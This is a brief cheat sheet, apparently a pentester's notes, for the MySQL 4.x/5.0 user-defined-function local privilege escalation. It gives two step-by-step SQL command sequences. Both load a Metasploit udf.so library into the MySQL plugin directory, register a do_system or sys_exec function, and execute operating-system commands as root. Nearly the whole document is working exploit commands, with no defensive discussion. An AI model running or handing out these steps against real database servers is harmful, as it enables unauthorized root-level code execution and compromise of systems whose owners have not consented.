# mysql exploit

## MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit

### Requirements

1. Mysql running as root
2. Insecure handling of files
3. Plugin directory knowledge

### .so file download

Download from [github:metasploit-framework](https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql)

#### Method 1 (access to box):

```bash
mysql -uroot -p<PASS>
> USE mysql;
> CREATE table kashz(line blob);
> INSERT INTO kashz VALUES(load_file('/PATH/udf.so'));
> SELECT * FROM kashz INTO dumpfile '/PLUGIN-DIR/udf.so';

# create function 
> CREATE FUNCTION do_system RETURNS integer soname 'udf.so';
> SELECT * from mysql.func;

# run RCE
> SELECT do_system('RCE');
```

#### Method 2 (no access no box):

* Generate shellcode: `xxd -p udf.so | tr -d '\n' > udf.so.hex`

```bash
> SELECT @@plugin_dir;
> SET @shell = 0x<SHELLCODE-DATA>;
> SELECT binary @shell into dumpfile 'PLUGIN-DIR/udf.so';

# create function
> CREATE FUNCTION sys_exec RETURNS int soname 'udf.so';
> SELECT * FROM mysql.func;

# run RCE
> SELECT sys_exec('RCE');
```

## References

* <https://www.exploit-db.com/exploits/1518>
* <https://github.sofianehamlaoui.fr/Security-Cheatsheets/databases/mysql/mysql-root-to-system-root/>
* <https://gist.github.com/p0c/8587757>